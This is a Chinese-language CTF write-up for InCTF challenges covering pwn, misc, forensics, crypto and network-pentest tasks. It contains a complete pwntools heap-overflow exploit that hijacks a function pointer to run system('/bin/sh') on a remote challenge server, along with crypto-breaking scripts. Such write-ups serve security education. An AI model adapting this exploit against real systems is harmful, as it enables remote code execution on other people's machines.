payload = flat(0x00000000384adf93, bin, 0x0000003200000001, 0x0003ffffffffffff)这时候会认为, run内的region都未使用, 通过偏移查找到p_func位置作为第一个被取出的region返回,
注意这个bin, 相对堆地址不变, 泄漏堆地址以后可以得到,
因为溢出使用的是0x20的region, 但是chunk结构体本身是0x18, 也在0x20的run中, 因此这个run中的排布是chunk-name-chunk-name-chunk-name, 这样溢出0x20字节也只是将name2后续的chunk写入到run结构体中,
这里我们利用free不会清空的机制,
首先malloc(0x20)+free, 使内存排布为chunkF-nameF-chunkF-nameF-chunkF-nameF
然后我们malloc(0x60)// 或者size只要不是0x20即可, 这样可以打乱原本的布局, 然后再次malloc(0x20)用于合并, 现在是: chunk-chunk-name-nameF-chunkF-nameF,
具体思路
首先泄漏pie和堆地址,
然后不断malloc(0x40), 留下0x7000这个run中的最后一个region,
然后合并两个0x20的人物,(会调用realloc(0x40)这个只是malloc+free而已), 此时获取到0x7000这个run中的最后一个region, 溢出0x20, 修改0x8000-0x8020, 即0x8000这个run的run结构体, 修改为没有region被使用的状态,
我们将/bin/sh\x00字符串写入到一个堆块中, 通过堆基地址可以找到, 当作参数1, pie泄漏, system地址使用plt表地址即可,
malloc(0x50), 从0x8000run中取出第一个region, 此时和p_func重合, 我们写入flat(system, binsh), 然后退出, 在程序最后激活system(binsh)即可.
from pwn import *
context.arch='amd64'
# context.log_level = 'debug'
def add(size, name):
sla(">> ", '1')
sla("nter the size : ", str(size))
sla("nter name : ", name)
def battle(id):
sla(">> ", '2')
sla("nter enemy id : ", str(id))
def merga(id1, id2):
sla(">> ", '3')
sla("id 1:", str(id1))
sla('id 2:', str(id2))
def kill(idx):
for i in range(7):
battle(idx)
sl('1')
def exp():
sl("b"* 0x20)
battle(-7)
ru("Starting battle with ")
leak = u64(re(6, 2).ljust(8, b'\x00'))
PIE = leak - 0x4008
print("pie: ")
print(hex(PIE))
slog['PIE'] = PIE
sl('2')
add(0x60, '1' * 0x20) # 0
add(0x60, '1' * 0x20) # 1
kill(0)
kill(1)
add(0x20, '') # 2
battle(2)
ru("Starting battle with ")
leak = u64(re(6, 2).ljust(8, b'\x00'))
heap = leak - 0xb00a
print("pie: ")
print(hex(heap))
slog['heap'] = heap
bin = 0x800d70 + heap
slog['bin'] = bin
add(0x20, 'a' * 0x20) # 3
for i in range(6):
battle(2)
sl('1')
kill(3)
# add(0x20, '1' * 0x20) # 4
# add(0x20, '2' * 0x20) # 5
for i in range (61):
add(0x40, 'a'*0x40)
# 0xa7e0 0xa800
add(0x20, '/bin/sh\x00') # 65
binsh = heap + 0xa800
# 0x820
add(0x20, '2' * 0x20) # 66
# add(0x20, '3' * 0x20) # 67
payload = flat(0x00000000384adf93, bin, 0x0000003200000001, 0x0003ffffffffffff)
# paylaod = 'a' * 0x20
add(0x20, payload) # 67
add(0x20, '4' * 0x20) # 68
add(0x20, '5' * 0x20) # 69
add(0x20, '6' * 0x20) # 70
kill(66)
kill(67)
kill(68)
kill(69)
add(0x60, 'z' * 0x60) # 71
add(0x20, '1' * 0x20) # 72 index2
merga(70, 72)
system = PIE + 0x000000000001170
paylaod = flat(system , binsh)
add(0x50, paylaod) # p_func
sl('4')
local = int(sys.argv[1])
slog = {'name' : 111}
if local:
cn = process('./bin')
else:
cn = remote("pwn.challenge.bi0s.in", 1230)
re = lambda m, t : cn.recv(numb=m, timeout=t)
recv= lambda : cn.recv()
ru = lambda x : cn.recvuntil(x)
rl = lambda : cn.recvline()
sd = lambda x : cn.send(x)
sl = lambda x : cn.sendline(x)
ia = lambda : cn.interactive()
sla = lambda a, b : cn.sendlineafter(a, b)
sa = lambda a, b : cn.sendafter(a, b)
sll = lambda x : cn.sendlineafter(':', x)
# after a, send b;
def slog_show():
for i in slog:
success(i + ' ==> ' + hex(slog[i]))
exp()
slog_show()
cn.interactive()
misc
alpha pie
nc misc.challenge.bi0s.in 1337
每回合会给一个方阵,对左侧字符进行上下左右的平移,在一定次数内是左边方阵等于右边,
移动指令:from.x,from.y,to.x,to.y
(示例:图中t向左一格的指令为:0,3,0,2)
从0开始,上下为x,左右为y
最少拐弯问题
from pwn import *
import copy
context.log_level = 'debug'
p = remote("misc.challenge.bi0s.in", 1337)
p.sendlineafter(b"Press 'y' to start: ", b"y")
def recv_level():
p.recvuntil(b"Max number of moves allowed:")
max_moves = int(p.recvline(), 10)
p.recvline()
mat1 = []
mat2 = []
while True:
data = p.recvline()
data = data.strip()
data = data.replace(b" ", b"")
if b'+-------' in data:
break
cords = [c for c in data.split(b"|") if c != b""]
baseline = len(cords) // 2
mat1.append(cords[0:baseline])
mat2.append(cords[baseline:])
return mat1, mat2, max_moves
def get_fucks(mat):
return [(x, y) for y in range(len(mat)) for x in range(len(mat[y])) if mat[y][x] != b'0']
def make_hist(start_p, end_p, mat,hist):
sym = mat[start_p[1]][start_p[0]]
if start_p[0] == end_p[0]: # y diffs
start_pos = min(start_p[1], end_p[1])
end_pos = max(start_p[1], end_p[1])
for i in range(start_pos, end_pos):
hist[i][start_p[0]].append(sym)
return
if start_p[1] == start_p[1]:
start_pos = min(start_p[0], end_p[0])
end_pos = max(start_p[0], end_p[0])
for i in range(start_pos, end_pos):
hist[start_p[1]][i].append(sym)
return
raise
def gen_next(mat1, targetPos, history, curPoint):
x = curPoint[0]
y = curPoint[1]
assert mat1[y][x] != b'0'
target = targetPos[mat1[y][x]]
if target == (x, y):
return []
# find mat1[y][x] in mat2
saved_x, saved_y = x, y
next_dir = []
# left
while x - 1 >= 0 and mat1[y][x] not in history[y][x - 1] and mat1[y][x - 1] == b'0' and x - 1 >= target[0]:
x -= 1
if saved_x != x:
next_dir.append((x, y))
x, y = saved_x, saved_y
# right
while x + 1 < len(mat1[0]) and mat1[y][x] not in history[y][x + 1] and mat1[y][x + 1] == b'0' and x + 1 <= target[0]:
x += 1
if saved_x != x:
next_dir.append((x, y))
x, y = saved_x, saved_y
# up
while y - 1 >= 0 and mat1[y][x] not in history[y - 1][x] and mat1[y - 1][x] == b'0' and y - 1 >= target[1]:
y -= 1
if saved_y != y:
next_dir.append((x, y))
x, y = saved_x, saved_y
# down
while y + 1 < len(mat1) and mat1[y][x] not in history[y + 1][x] and mat1[y + 1][x] == b'0' and y + 1 <= target[1]:
y += 1
if saved_y != y:
next_dir.append((x, y))
return next_dir
def printMat(mat):
for y in mat:
for x in y:
print(x.decode('ascii'), end=" ")
print("")
print("=============")
def solve():
mat1, mat2, max1 = recv_level()
targetPos = dict()
for y in range(len(mat2)):
for x in range(len(mat2[0])):
if mat2[y][x] != b'0':
targetPos[mat2[y][x]] = (x, y)
def dfs(mat1, history, track):
#printMat(mat1)
if mat1 == mat2:
print("find:", track)
# check valid
if len(track) <= max1:
solved = track
print("real find:", track)
return track
else:
return None
if len(track) > max1:
return None
for f in get_fucks(mat1):
all_next = gen_next(mat1, targetPos, history, f)
for the_next in all_next:
new_mat1 = copy.deepcopy(mat1)
new_hist = copy.deepcopy(history)
new_track = copy.deepcopy(track)
make_hist(f, the_next, mat1, new_hist)
#new_hist[f[1]][f[0]].append(new_mat1[f[1]][f[0]])
new_mat1[the_next[1]][the_next[0]] = new_mat1[f[1]][f[0]]
new_mat1[f[1]][f[0]] = b'0'
new_track.append((f, the_next))
res = dfs(new_mat1, new_hist, new_track)
if res != None:
return res
hist = [[[] for i in range(len(mat1))] for j in range(len(mat1[0]))]
solved = dfs(mat1, hist, [])
if solved != None:
for way in solved:
fx = way[0][1]
fy = way[0][0]
tx = way[1][1]
ty = way[1][0]
tt = "%d,%d,%d,%d" % ((fx, fy, tx, ty))
p.sendlineafter(",to-y-cord ' : ", tt)
for i in range(9):
solve()
p.interactive()
forensics
Ermittlung
进程是msimn.exe, outlook的程序,
进程名: Outlook_Express
时间: 2020-07-27 12:26:17
参考文章 其中第19条表示相关信息储存在NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\UnreadMail, 我尝试在文件中搜索NTUSER.DAT, 成功找到几个, 然后导出文件.
之后找到了这个文章简单讲述了如何分析NTUSER.DAT文件, 其实这个是个windows注册表文件, 使用Registry Explorer可以分析,
然后我们得到未读信息和版本号,
未读信息数量: 4
版本号: 6.0.2900.5512
flag: inctf{Outlook_Express_27-07-2020_12:26:17_4_6.0.2900.5512}
crypto
gold_digger
def encrypt(msg, N,x):
msg, ciphertexts = bin(bytes_to_long(msg))[2:], []
for i in msg:
while True:
r = random.randint(1, N)
if gcd(r, N) == 1:
bin_r = bin(r)[2:]
c = (pow(x, int(bin_r + i, 2), N) * r ** 2) % N
ciphertexts.append(c)
break
return ciphertexts
这里可以写成
c = (pow(x, int(bin_r + i, 2), N) * r ** 2) % N
如果 flag i位 为 1 ,r+1 则为奇数
否则 位偶数
通过这个条件,可以利用雅可比符号计算二次剩余的存在性来判断flag第i位的值
solution
from Crypto.Util.number import *
import gmpy2
from data import ct
N = 76412591878589062218268295214588155113848214591159651706606899098148826991765244918845852654692521227796262805383954625826786269714537214851151966113019
x = 72734035256658283650328188108558881627733900313945552572062845397682235996608686482192322284661734065398540319882182671287066089407681557887237904496283
plaintext = ''
for line in ct:
if gmpy2.jacobi(line,N) == -1:
plaintext += '1'
else:
plaintext += '0'
print(long_to_bytes(int(plaintext,2)))
# inctf{n0w_I_4in7_73ll1ng_u_4_g0ldd1gg3r}
Lost Baggag
格解背包
sagemath lattice reduction code:
import pickle
data = pickle.load(open('enc.pickle', 'rb'))
cip = data['cip']
pbkey = data['pbkey']
print(len(pbkey))
S = cip
M = pbkey
n = len(M)
L = matrix.zero(n + 1)
for row, x in enumerate(M):
L[row, row] = 2
L[row, -1] = x
L[-1, :] = 1
L[-1, -1] = S
f = open('LLLdata.txt','a+')
res = L.LLL()
for i in range(144):
ans = list(res[i])
f.write(str(ans)+'\n')
print(ans)
用以下矩阵构造
将LLLdata.txt里面每一行向量都拿出来试一遍就得到flag了
from Crypto.Util.number import *
ans = [-1, 1, -1, -1, -1, -1, -1, 1, -1, -1, -1, -1, -1, -1, 1, 1, -1, -1, -1, 1, 1, -1, -1, 1, 1, 1, -1, 1, -1, -1, 1, 1, 1, -1, 1, 1, 1, -1, -1, 1, -1, -1, -1, -1, -1, 1, -1, 1, 1, 1, -1, 1, -1, -1, 1, 1, -1, 1, -1, -1, 1, -1, -1, 1, -1, -1, -1, -1, -1, 1, -1, 1, -1, 1, -1, 1, -1, -1, 1, 1, 1, -1, 1, 1, -1, -1, -1, 1, -1, -1, -1, 1, -1, -1, -1, 1, -1, -1, 1, -1, -1, -1, -1, 1, 1, -1, -1, 1, 1, -1, -1, 1, 1, 1, -1, 1, -1, -1, -1, 1, -1, -1, 1, 1, 1, -1, -1, 1, 1, -1, -1, -1, 1, -1, -1, 1, -1, 1, 1, -1, 1, -1, -1, 1]
flag = ''
for i in ans:
if(i == -1):
flag+='1'
else:
flag+='0'
msg = int(flag[::-1],2)
print(long_to_bytes(msg))
flag = ''
for i in ans:
if(i == -1):
flag+='0'
else:
flag+='1'
msg = int(flag[::-1],2)
print(long_to_bytes(msg))
# inctf{wr5_m4_b4g?}
Right Now Generator
主要难度在逆向上面
def wrap(self, pr=True):
hsze = self.sze//2
for i in range(self.sze):
r1 = self.seed[i]
r2 = self.seed[(i+hsze)%self.sze]
self.seed[i] = ((r1^self.pad)*r2)%self.mod
self.ctr = 0
def next(self):
a, b, c, d = (self.seed[self.ctr^i] for i in range(4))
mod = self.mod
k = 1 if self.ctr%2 else 2
a, b, c, d = (k*a-b)%mod, (b-c)%mod, (c-d)%mod, (d-a)%mod
self.ctr += 1
if self.ctr==64:
self.wrap(pr=False)
return a
主要难度在上面两个函数的逆向上面
可以轻易地写出反函数
由a序列得到seed序列的:
def from_aa_get_seed(aa):
seed=[]
for i in range(0,63,4):
tmp = aa[i:i+4]
a1,a2,a3,a4 = tmp
s0 = (a1+a2)%mod
s1 = (2*a2+a1)%mod
s2 = (a3+a4)%mod
s3 = (2*a4+a3)%mod
seed = seed + [s0,s1,s2,s3]
return seed
inv_wrap:
def inv_wrap(seed):
for i in range(32):
r2 = seed[i]
r1 = ((seed[i+32]*libnum.invmod(r2,mod))%mod)^pad
seed[i+32]=r1
for i in range(32):
r2 = seed[i+32]
r1 = ((seed[i]*libnum.invmod(r2,mod))%mod)^pad
seed[i] = r1
return seed
组合到一起就完事
Solution
import random, hashlib, os, gmpy2, pickle
import libnum
from libnum.modular import invmod
from Crypto.Util.number import *
from Crypto.Cipher import AES
# -----------------------------------
pad = 0xDEADC0DE
sze = 64
mod = 18446744073709551629
def inv_wrap(seed):
for i in range(32):
r2 = seed[i]
r1 = ((seed[i+32]*libnum.invmod(r2,mod))%mod)^pad
seed[i+32]=r1
for i in range(32):
r2 = seed[i+32]
r1 = ((seed[i]*libnum.invmod(r2,mod))%mod)^pad
seed[i] = r1
return seed
def from_aa_get_seed(aa):
seed=[]
for i in range(0,63,4):
tmp = aa[i:i+4]
a1,a2,a3,a4 = tmp
s0 = (a1+a2)%mod
s1 = (2*a2+a1)%mod
s2 = (a3+a4)%mod
s3 = (2*a4+a3)%mod
seed = seed + [s0,s1,s2,s3]
return seed
def from_leak_get_aa(leak):
aa =[]
for i in range(0,1024,16):
tmp =leak[i:i+16]
s = bytes.fromhex(tmp)
tmp = bytes_to_long(s)
aa.append(tmp)
return aa
def next(seed1,i):
ctr = i
a, b, c, d = (seed1[ctr^i] for i in range(4))
mod = 18446744073709551629
k = 1 if ctr%2 else 2 # 1 和 2 交替出现,可控
a, b, c, d = (k*a-b)%mod, (b-c)%mod, (c-d)%mod, (d-a)%mod
return a
enc = {'cip': '71d39d37d3c03e08b82d81ae3b4be658e2dbdaee6a73d73a3e88271f423db30f0422d4fb9475ceef281a746afa86eaee', 'iv': 'cbf411655acfd7f670968ccf44d74e05', 'leak': '3aeba43302ab9ad0df898103fc0223be23f5ec10f62ad48744c2ec06bc4ac9b2290aff5f5d17fc2ff2a1115e657ddced0f12238ca12b076bf85fed0ce621202d159c014907e39ba7373ada78a4dea3a76bfb9ff09a8f10705cd95a47edd743fde25f32ab545bf98bba1344bed511b0c095ddede11b4a35bc02acb34d3aef46c56bfc9b668c82c0d3da76307dd87016e1a7df478cdefb98d4fe991088f478f24390fac3d4f0d0673d2801f37df421ab17cb72af64a8b21ebf9d73c3ef35a8bd5fe98c62a910ef8b859b86a58bf670fe544266bc37a36d3828e7397bac0b817f41522e76a68661b3e9952ed3d2eb7846b2f9cd2c1cc44eda2ac536eb826ce922afaa4c7d61ff3db9023cf2fff8fb34791954fbb1541f043fe26e92fb79f119fbe175bd1b551dd1225275a457580bef4301505f474060f39caad6d3172f17a9a21f68e66b59a13e817b0201dbdbcc1e6c1d80ab2e8d38f7f0a62d0bb3577da845643273b1743f5aac064422bdbd85358f6da726f9114c5553432d4f4e2f43f997975add7ea3b6a56b689ff84f7635815879e28d8c7421b979449f5bccb29cce745862610af8c99379c60e1205d5e1eda9d2f5243d4da4325ac142bd196d1777bd2d4f61eb355b7fca3e16295d05e8a21e75f010272ce159afb49fa3d4b97bd242304e34599f7bc8edf5b4430bb42b12437b7c27583d303043311afd56fae70a7d6b'}
leak = enc['leak']
aa = from_leak_get_aa(leak)
seed = from_aa_get_seed(aa)
seed_prev = inv_wrap(seed)
out1 = ''.join([format(next(seed_prev,i), '016x') for i in range(64)])
key = bytes.fromhex(out1)
key = hashlib.sha256(key).digest()[:16]
cip = enc['cip']
iv = enc['iv']
cip = bytes.fromhex(cip)
iv = bytes.fromhex(iv)
aes = AES.new(key, AES.MODE_CBC, iv)
flag = aes.decrypt(cip)
print(flag)
# b'inctf{S1mpl3_RN65_r_7h3_b35t!_b35e496b4d570c16}\x01'
Eazy Xchange
给gen_key稍微变换一下
def gen_key(G, pvkey):
G = sum([i*G for i in pvkey])
return G
def gen_key(G, pvkey):
tmp = sum([i for i in pvkey])
return G*tmp
这里tmp很小
def gen_bob_key(EC, G):
bkey = os.urandom(4)
B = gen_key(G, bkey)
return B, bkey
由gen_bob_key可知
稍微爆破一下得到flag
import os, hashlib, pickle
from tqdm import tqdm
# -----------------------------------
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
p = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
a = p - 3
b = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
EC = EllipticCurve(GF(p), [a, b])
G = EC.gens()[0] # 固定的点
def decrypt(cip, key,iv):
key = hashlib.sha256(str(key).encode()).digest()[:16]
cipher = AES.new(key, AES.MODE_CBC, iv)
return cipher.decrypt(cip)
data = {'cip': '9dcc2c462c7cd13d7e37898620c6cdf12c4d7b2f36673f55c0642e1e2128793676d985970f0b5024721afaaf02f2f045', 'iv': 'cbd6c57eac650a687a7c938d90e382aa', 'G': '(38764697308493389993546589472262590866107682806682771450105924429005322578970 : 112597290425349970187225006888153254041358622497584092630146848080355182942680 : 1)'}
FLAG = data['cip']
iv = data['iv']
FLAG = bytes.fromhex(FLAG)
iv = bytes.fromhex(iv)
x = 38764697308493389993546589472262590866107682806682771450105924429005322578970
y = 112597290425349970187225006888153254041358622497584092630146848080355182942680
G = EC(x,y)
print(G)
SS = G
for i in tqdm(range(2,1024*1024)):
SS = SS+G
msg = decrypt(FLAG, SS.xy()[0],iv)
if(b'inctf' in msg):
print(msg)
break
# inctf{w0w_DH_15_5o_c00l!_3c9cdad74c27d1fc}
Encrypted Operations
这个太哈人了 全是cpp
审了一天
发现印度老哥这个vector的理解和我不一样,缝缝补补终于搞出来了
反正这个题应该很难有复现环境了
(其实能把homomorphic_system复写一遍应该还是可以的?放在docker里面还是比较好部署的)
就干脆简单说一下三个部分的思路好了🐫
prat1
for (int x = 0; x < 20; x++)
{
for (int y = 0; y < 20; y++)
{
m[x][y] = ++val;
}
}
int d = 20;
int r = 3;
int c = 3;
for (int i = 0; i < 18; i++)
{
for (int j = 0; j < 18; j++)
{
for (int p = 0; p < 3; p++)
{
for (int q = 0; q < 3; q++)
{
mat.push_back(m[i + p][j + q]);
}
}
}
}
for (int j = 0; j < int(mat.size()); j += 9)
{
v.push_back(slice(mat, j, j + 9));//切片矩阵化
}
idx = Genrand(0, v.size() - 1);
vector<int64_t> temp1(begin(v[idx]), end(v[idx]));
vector<int64_t> mvector = temp1;
sum1 = accumulate(mvector.begin(), mvector.end(), 0);//随机先去一个切片求和
FheEncrypt(mvector);
EncryptedOperations();
vector<int64_t> p = FheDecrypt();
if (sum1 == 0)
{
cout << "\n\nCHALLENGE CORRUPTED!!!!";
exit(0);
}
if (p[0] == sum1)
cout << "\n\nYou got all the encrypted operations right! Great!!\n\nNow on to the next\n\n";
else
exit(0);
拿导外面跑一下发现其实就是对切片求和,由于temp1里面本质上是个等差数列,找一下规律就可以了
part2同理
payload1
9 0 0 0
*
1
y
189 0 0 0
+
1
n
189 0 0 0
+
1
n
+
20 0 0 0
*
1
y
830 0 0 0
+
1
n
level2 对 p1 p2 取反使其抵消掉numVec里面除了m1[row[2]]以外的所有向量
在 userinp生成处,往后多选了一位,这个操作可以在EncryptedOperations中对m1[row[2]]右移一位抵消掉影响,最有一位并不会消失,而是会将vector的长度扩展一位
p = vector<int64_t>(p.begin(), p.begin() + 5 + 1);
exp
from pwn import *
from pwnlib.util.iters import random_permutation
# crypto.challenge.bi0s.in 1221
data = """9 0 0 0
*
1
y
189 0 0 0
+
1
n
189 0 0 0
+
1
n
+
20 0 0 0
*
1
y
830 0 0 0
+
1
n
0 0 0 0 0
>
1
n
-1 -1 -1 -1 -1
*
1
n
-1 -1 -1 -1 -1
*
1
n
"""
io = remote('crypto.challenge.bi0s.in',1221)
io.sendline(data)
io.recvuntil('flag')
io.recvuntil('flag')
buf = io.recv(2048)
if(b'inctf' in buf):
print(buf)
exit(0)
# inctfi{m4st3r_0f_Encrypt3d_0p3r4t1on5_B3c0m3_u_H4v3!!}
shell
❯❯ inctf 22:18 python3 -u "c:\Users\16953\Desktop\inctf\Encrypted Operations\src\exp.py"
[x] Opening connection to crypto.challenge.bi0s.in on port 1221
[x] Opening connection to crypto.challenge.bi0s.in on port 1221: Trying 34.106.211.122
[+] Opening connection to crypto.challenge.bi0s.in on port 1221: Done
b': inctfi{m4st3r_0f_Encrypt3d_0p3r4t1on5_B3c0m3_u_H4v3!!}\n\n\nThankyou for using the srvice! Sucessfully performed all operatoions!!\n\n\nExiting!!'
[*] Closed connection to crypto.challenge.bi0s.in port 1221
Challenge-attachment
network-pentest
Listen
def listen():
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
skt.bind(('172.30.0.14',31337))
skt.listen(1)
handle,addr=skt.accept()
print(handle.recv(2048).decode())
print(handle.recv(2048).decode())
print(handle.recv(2048).decode())
print(handle.recv(2048).decode())
listen()
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论